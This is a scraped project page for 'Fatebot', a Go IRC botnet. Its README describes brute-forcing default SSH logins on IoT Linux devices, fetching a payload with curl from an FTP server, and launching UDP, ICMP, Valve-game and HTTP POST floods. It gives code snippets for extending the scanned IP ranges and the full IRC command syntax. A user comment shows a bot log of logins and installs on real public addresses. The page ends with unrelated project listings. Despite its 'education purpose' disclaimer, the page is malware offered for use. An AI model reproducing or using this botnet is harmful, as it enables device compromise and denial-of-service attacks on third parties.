IRC bot for launch ddos attack, Mainly of scan target are IoT device that run linux and open default SSH port

Attention Attention!!! My english is terrible. I'm so sorry about that :(

Fatebot v0.3.1

This is my first IRC bot for launch ddos attack, Mainly of scan target are IoT device that run linux and open default SSH port, This bot is write on Go language. For education purpose only. Please test it in your lab. And i create this for join university in the future not for attack anyone server with out any permission!!!

IRC commands are in the bottom of The page.

Dr Fate

Infect

The infect function of this botnet is scanning by default SSH port(Scan on range of CHN network. You can add more or change it, if you want.) and login by Brute-force attack. This botnet use "curl" to get payload from FTP server, so... please prepair your FTP server first, It very important for infect process.

I scan on my private netowrk in SSH range, And comment a function of running session.(That's why bot is not join The server.) SSH scan

Add more IP range

(1) Go to "scan.go" file in pkg folder. Add your new ip range in to The group of const varible.

	var_name = "224." //224.0.0.0 - 224.255.255.255
	or
	var_anme = "224.12" //224.12.0.0 - 224.255.255.255

(2) Go to "NextIP" function, And add The case for your ip range and return range of your ip.

	case var_name:
			return ManageIP_range(ipRange, GenRange(255, 0))
	or
	case var_name:
			return ManageIP_range(ipRange, "")

(3) Then go to The "SSH_Conn" function, And add your constant ip range to The array name "NetArr".

	NetArr := []string{
		chpn1, chpn2, chpn3, chpn4, chpn5, cgpn1, cgpn2, cgpn3,
		cgpn4, cgpn5, cgpn6, var_name,
	}

DDoS

Raw socket programming is really hard for me. That's why all of The volumetric are a simple like udp and icmp flood. Main DDoS function is on The Application layer.

http post flood, dos example

Build payload

how to build

Update Lists

Fatebot v0.1 = Fatebot open release.

Fatebot v0.2 = Update get bot system information function and Add tutorial in main and scan file.

Fatebot v0.2.1 = Cut private scanning and OS signal by change it to delete when running. And change some IRC commands that will type easier.

Fatebot v0.2.2 = Cut scan failed report for fix server overheat and excess flood, And Optimize by change ip range and default ping time, That will help to find SSH port faster.(Maybe, But fast than old one.)

Fatebot v0.3 = Update new DDoS Vector. Set size of UDP packet to 700 as default when bot herder not input The size.

Fatebot v0.3.1 = Fix vse and post flood. Fix IRC configuration that will make a little easy to config and change project layout.

IRC Commands

  • ?udp [ip] [size]
    • ?udp 192.168.1.16 500
    • - Flood UDP packets by random src and dst port to target.

      - Min and Max of Buffer is 1 - 700bytes.

  • ?icmp [ip]
    • ?icmp 192.168.1.16
    • - Flood ICMP with large packets to target.
  • ?vse [ip]
    • ?vse 192.168.1.16
    • - Flood UDP packets by random src port with valve source engine dst port. To the target server that used to host online games.
  • ?scan [ftp server]
    • ?scan ftp://192.186.1.16/payload
    • - Scan CHN ip range on SSH port and get payload with curl.
  • ?info
    • - Get bot system information.
  • ?kill
    • - Kick bot out of The server.
  • ?stopddos
    • - Stop ddos attacking.
  • ?stopscan
    • - Stop scanning.
Owner
Bozer
Newbie Security Software and Malware Developer.
Bozer
Similar Resources

A bot based on Telegram Bot API written in Golang allows users to download public Instagram photos, videos, and albums without receiving the user's credentials.

InstagramRobot InstagramRobot is a bot based on Telegram Bot API written in Golang that allows users to download public Instagram photos, videos, and

Dec 16, 2021

Sex-bot - The sex bot and its uncreative responses

Sex-bot - The sex bot and its uncreative responses

Sex Bot The sex bot, made with golang! The sex bot can't hear the word "sexo" he

Nov 11, 2022

Dlercloud-telegram-bot - A Telegram bot for managing your Dler Cloud account

Dler Cloud Telegram Bot A Telegram bot for managing your Dler Cloud account. Usa

Dec 30, 2021

Quote-bot - Un bot utilisant l'API Twitter pour tweeter une citation par jour sur la programmation et les mathématiques.

Description Ceci est un simple bot programmé en Golang qui tweet une citation sur la programmation tout les jours. Ce bot est host sur le compte Twitt

Jan 1, 2022

Discord-bot - A Discord bot with golang

JS discord bots Install Clone repo git clone https://github.com/fu-js/discord-bo

Aug 2, 2022

Bot - Telegram Music Bot in Go

Telegram Music Bot in Go An example bot using gotgcalls. Setup Install the serve

Jun 28, 2022

Pro-bot - A telegram bot to play around with the community telegram channels

pro-bot 🤖 Pro Bot A Telegram Bot to Play Around With The Community Telegram Cha

Jan 24, 2022

Slack-emoji-bot - This Slack bot will post the newly created custom Slack emojis to the channel of your choice

Slack Emoji Bot This Slack bot will post the newly created custom Slack emojis t

Oct 21, 2022

Feline-bot - Feline Bot for Discord using Golang

Feline Bot for Discord Development This bot is implemented using Golang. Feature

Feb 10, 2022
Comments
  • some bug

    some bug

    I like messing with your bot (:

    (03:57:12) <@ME> ?scan -r MY.PAYLOAD (03:57:12) <@[BOT][F][9758249]> START SCANNING. (03:58:03) <@[BOT][F][9758249]> Try to login: 125.135.102.241:22 (03:58:04) <@[BOT][F][9758249]> Login success: 125.135.102.241:22 (03:58:05) <@[BOT][F][9758249]> Installing bot: 125.135.102.241:22 (03:59:06) <@[BOT][F][9758249]> Try to login: 82.102.234.7:22 (04:00:55) <@ME> ?stopscan (04:02:42) <@ME> ?stopscan

    He just got stuck

IRC, Slack, Telegram and RocketChat bot written in go
IRC, Slack, Telegram and RocketChat bot written in go

go-bot IRC, Slack & Telegram bot written in Go using go-ircevent for IRC connectivity, nlopes/slack for Slack and Syfaro/telegram-bot-api for Telegram

Dec 20, 2022
Jaken - A general purpose IRC bot featuring user acls and arbitrary plugins

Design principles This bot is based on the premise of a loosely coupling between

Jul 21, 2022
The Tenyks IRC bot.

Tenyks is a computer program designed to relay messages between connections to IRC networks and custom built services written in any number of languages.

Sep 26, 2022
Bot-template - A simple bot template for creating a bot which includes a config, postgresql database

bot-template This is a simple bot template for creating a bot which includes a c

Sep 9, 2022
A tool written in GO to demonstrate how bad actors utilize requests to spam Discord Users and launch large unsolicited DM Advertisement Campaigns
A tool written in GO to demonstrate how bad actors utilize requests to spam Discord Users and launch large unsolicited DM Advertisement Campaigns

discord-mass-DM-GO A tool written in GO to demonstrate how bad actors utilize requests to spam Discord Users and launch large unsolicited DM Advertise

Jan 2, 2023
go irc client for twitch.tv

go-twitch-irc This is an irc client for connecting to twitch. It handles the annoying stuff like irc tag parsing. I highly recommend reading the docum

Dec 27, 2022
A modern IRC server (daemon/ircd) written in Go.
A modern IRC server (daemon/ircd) written in Go.

Oragono is a modern IRC server written in Go. Its core design principles are: Being simple to set up and use Combining the features of an ircd, a serv

Dec 31, 2022
Bot flash sale shopee tanpa webdriver atau selenium. support Android (Termux), Windows, dan Linux

Disclaimer Pembuat bot ini tidak bertanggung jawab jika anda kena banned/blokir shopee Fitur Tidak mengandalkan webdriver atau selenium dapat membuat

Dec 27, 2022
A Telegram bot that will run code for you.

piston_bot A Telegram bot that will run code for you. Made using piston. Available as @iruncode_bot on telegram. Examples Basic example Input: /run py

Sep 11, 2022
Kelp is a free and open-source trading bot for the Stellar DEX and 100+ centralized exchanges
Kelp is a free and open-source trading bot for the Stellar DEX and 100+ centralized exchanges

Kelp Kelp is a free and open-source trading bot for the Stellar universal marketplace and for centralized exchanges such as Binance, Kraken, CoinbaseP

Jan 6, 2023